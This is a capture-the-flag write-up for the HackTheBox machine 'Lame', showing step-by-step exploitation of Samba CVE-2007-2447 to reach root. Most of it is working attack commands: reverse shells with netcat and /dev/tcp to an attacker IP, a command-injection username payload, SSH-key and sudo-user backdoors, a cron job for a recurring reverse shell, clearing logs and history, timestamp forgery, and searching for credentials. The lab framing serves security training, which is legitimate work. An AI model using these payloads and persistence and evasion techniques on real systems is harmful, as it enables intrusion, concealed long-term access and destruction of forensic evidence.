Post

HackTheBox Lame

Writeup for HackTheBox Lame

HackTheBox Lame

Machine Synopsis

Key Exploitation Techniques:

  • Samba usermap script vulnerability (CVE-2007-2447)
  • Remote code execution to immediate root access
  • Alternative exploitation paths analysis

Reconnaissance & Enumeration

Port Discovery

1
2
3
4
5
6
$ nmap -p- --min-rate 10000 10.10.10.3
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Service Enumeration

1
2
3
4
5
6
7
$ nmap -p 21,22,139,445 -sC -sV 10.10.10.3
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)

Vulnerability Research

1
2
3
4
5
$ searchsploit vsftpd 2.3.4
vsftpd 2.3.4 - Backdoor Command Execution | unix/remote/17491.rb

$ searchsploit samba 3.0.20
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution | unix/remote/16320.rb

Exploitation

Failed Attempt: vsftpd 2.3.4 Backdoor

1
2
3
4
5
6
7
$ msfconsole -q
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.10.10.3
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.

Successful Exploitation: Samba CVE-2007-2447

Manual Exploitation

1
2
3
4
5
6
7
8
9
10
11
# Download the exploit
$ wget https://raw.githubusercontent.com/amriunix/CVE-2007-2447/master/usermap_script.py

# Setup netcat listener
$ nc -nlvp 1234

# Execute exploit
$ python usermap_script.py 10.10.10.3 445 10.10.14.3 1234
[*] CVE-2007-2447 - Samba usermap script
[+] Connecting !
[+] Payload was sent - check netcat !

Root Shell Access

1
2
3
4
5
6
7
8
9
10
11
12
$ nc -nlvp 1234
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.3] 34329
id
uid=0(root) gid=0(root)

cd /root
cat root.txt
1958f8c5ebfa347cc8dc6b7c35a3b132

cd /home/makis
cat user.txt 
a848bb4bcd8a9651138d9cfa73d4d16e

Post-Exploitation Techniques

Persistence Methods

SSH Key Installation

1
2
3
4
5
6
7
8
9
10
# Generate SSH key pair
$ ssh-keygen -t rsa -b 2048 -f lame_key

# Install public key on target
echo "ssh-rsa AAAAB3NzaC1yc2E..." >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
chmod 700 /root/.ssh

# Test SSH access
$ ssh -i lame_key root@10.10.10.3

Backdoor User Account

1
2
3
4
# Create backdoor user with root privileges
useradd -m -s /bin/bash -G sudo backup
echo 'backup:password123' | chpasswd
echo "backup ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers

Cron Job Persistence

1
2
3
4
5
# Add persistent reverse shell cron job
echo "*/5 * * * * root /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.3/4444 0>&1'" >> /etc/crontab

# Verify cron job
crontab -l

Defense Evasion

Log Cleanup

1
2
3
4
5
6
7
8
9
10
11
12
13
# Clear system logs
echo > /var/log/auth.log
echo > /var/log/syslog
echo > /var/log/daemon.log

# Clear Samba logs
echo > /var/log/samba/log.smbd
echo > /var/log/samba/log.nmbd

# Clear bash history
history -c
echo > /root/.bash_history
unset HISTFILE

File Timestamp Manipulation

1
2
3
# Match timestamps to system files
touch -r /bin/bash /tmp/backdoor
touch -r /etc/passwd /root/.ssh/authorized_keys

Lateral Movement Preparation

Network Discovery

1
2
3
4
5
# Discover network hosts
nmap -sn 10.10.10.0/24

# Port scanning
nmap -sS -A 10.10.10.1-254

Credential Harvesting

1
2
3
4
5
6
# Search for stored credentials
grep -r "password" /etc/ 2>/dev/null | grep -v "Binary"
find /home -name "*.txt" -o -name "*.conf" -o -name "*.xml" | xargs grep -l "password" 2>/dev/null

# Check Samba configuration
cat /etc/samba/smb.conf | grep -E "(user|pass)"

Alternative Exploitation Methods

Metasploit Module

1
2
3
4
5
6
7
8
9
msf6 > use exploit/multi/samba/usermap_script
msf6 exploit(multi/samba/usermap_script) > set RHOSTS 10.10.10.3
msf6 exploit(multi/samba/usermap_script) > set LHOST 10.10.14.3
msf6 exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP handler on 10.10.14.3:4444 
[*] Command shell session 1 opened
id
uid=0(root) gid=0(root)

Manual SMB Client Exploitation

1
2
3
# Connect using smbclient with malicious username
$ smbclient //10.10.10.3/tmp
smb: \> logon "/=`nohup nc -e /bin/sh 10.10.14.3 1337`"

This post is licensed under CC BY 4.0 by the author.